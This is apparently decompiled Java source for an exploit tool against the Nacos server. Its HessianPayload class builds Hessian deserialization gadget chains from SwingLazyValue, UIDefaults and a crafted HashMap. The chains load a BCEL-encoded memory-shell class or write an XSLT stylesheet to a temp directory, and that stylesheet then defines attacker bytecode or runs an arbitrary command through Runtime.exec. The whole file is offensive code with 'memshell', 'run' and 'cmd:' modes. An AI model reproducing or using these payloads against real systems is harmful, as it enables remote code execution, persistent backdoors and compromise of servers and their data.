package com.alibaba.nacos.consistency.entity;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Random;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javax.swing.UIDefaults;
import org.apache.commons.io.IOUtils;
import org.springframework.web.servlet.tags.form.InputTag;
import sun.misc.BASE64Encoder;
import sun.swing.SwingLazyValue;

/* loaded from: input_file:com/alibaba/nacos/consistency/entity/HessianPayload.class */
public class HessianPayload {
    public static String os = "linux";
    static final String xsltTemplate = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\nxmlns:b64=\"http://xml.apache.org/xalan/java/sun.misc.BASE64Decoder\"\nxmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\"\nxmlns:th=\"http://xml.apache.org/xalan/java/java.lang.Thread\"\nxmlns:ru=\"http://xml.apache.org/xalan/java/org.springframework.cglib.core.ReflectUtils\"\n>\n    <xsl:template match=\"/\">\n      <xsl:variable name=\"bs\" select=\"b64:decodeBuffer(b64:new(),'<base64_payload>')\"/>\n      <xsl:variable name=\"cl\" select=\"th:getContextClassLoader(th:currentThread())\"/>\n      <xsl:variable name=\"rce\" select=\"ru:defineClass('<class_name>',$bs,$cl)\"/>\n      <xsl:value-of select=\"$rce\"/>\n    </xsl:template>\n  </xsl:stylesheet>";
    static final String xsltTemplateJustRce = "<xsl:stylesheet version=\"2.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:java=\"http://saxon.sf.net/java-type\">\n    <xsl:template match=\"/\">\n    <xsl:value-of select=\"Runtime:exec(Runtime:getRuntime(),'<command>')\" xmlns:Runtime=\"java.lang.Runtime\"/>\n    </xsl:template>\n</xsl:stylesheet>";

    public static String genClassName() {
        Random random = new Random();
        int nextInt = random.nextInt(10) + 1;
        StringBuilder sb = new StringBuilder(nextInt);
        for (int i = 0; i < nextInt; i++) {
            sb.append((char) (random.nextInt(25) + 97));
        }
        return sb.toString();
    }

    public static HashMap<Object, Object> makeMap(Object obj, Object obj2) throws Exception {
        Class<?> cls;
        HashMap<Object, Object> hashMap = new HashMap<>();
        Reflections.setFieldValue(hashMap, InputTag.SIZE_ATTRIBUTE, 2);
        try {
            cls = Class.forName("java.util.HashMap$Node");
        } catch (ClassNotFoundException e) {
            cls = Class.forName("java.util.HashMap$Entry");
        }
        Constructor<?> declaredConstructor = cls.getDeclaredConstructor(Integer.TYPE, Object.class, Object.class, cls);
        declaredConstructor.setAccessible(true);
        Object newInstance = Array.newInstance(cls, 2);
        Array.set(newInstance, 0, declaredConstructor.newInstance(0, obj, obj, null));
        Array.set(newInstance, 1, declaredConstructor.newInstance(0, obj2, obj2, null));
        Reflections.setFieldValue(hashMap, "table", newInstance);
        return hashMap;
    }

    public static Object genPayloadOfBcel() throws Exception {
        SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.bcel.internal.util.JavaWrapper", "_main", new Object[]{new String[]{"$$BCEL$$" + Utility.encode(Repository.lookupClass(NacosFilterShellPlus.class).getBytes(), true)}});
        UIDefaults uIDefaults = new UIDefaults();
        uIDefaults.put(swingLazyValue, swingLazyValue);
        Hashtable hashtable = new Hashtable();
        hashtable.put(swingLazyValue, swingLazyValue);
        return makeMap(uIDefaults, hashtable);
    }

    public static Object genPayloadOfXslt(String str) throws Exception {
        String str2 = "/tmp/nacos_data_temp";
        if ("linux".equalsIgnoreCase(os)) {
            str2 = "/tmp/nacos_data_temp";
        } else if ("windows".equalsIgnoreCase(os)) {
            str2 = "C:\\Windows\\Temp\\nacos_data_temp";
        }
        SwingLazyValue swingLazyValue = null;
        if (str.equals("memshell")) {
            ClassPool classPool = ClassPool.getDefault();
            classPool.insertClassPath(new ClassClassPath(NacosFilterShellPlus.class));
            CtClass ctClass = classPool.get(NacosFilterShellPlus.class.getName());
            ctClass.setName(genClassName());
            swingLazyValue = new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{str2, xsltTemplate.replace("<base64_payload>", new BASE64Encoder().encode(ctClass.toBytecode()).replaceAll("\r\n", "").replaceAll(IOUtils.LINE_SEPARATOR_UNIX, "")).replace("<class_name>", ctClass.getName()).getBytes()});
        } else if (str.equals("run")) {
            swingLazyValue = new SwingLazyValue("com.sun.org.apache.xalan.internal.xslt.Process", "_main", new Object[]{new String[]{"-XT", "-XSL", "file://" + str2}});
        } else if (str.startsWith("cmd:")) {
            swingLazyValue = new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{str2, xsltTemplateJustRce.replace("<command>", str.substring(4)).getBytes()});
        }
        UIDefaults uIDefaults = new UIDefaults();
        uIDefaults.put(swingLazyValue, swingLazyValue);
        Hashtable hashtable = new Hashtable();
        hashtable.put(swingLazyValue, swingLazyValue);
        return makeMap(uIDefaults, hashtable);
    }
}
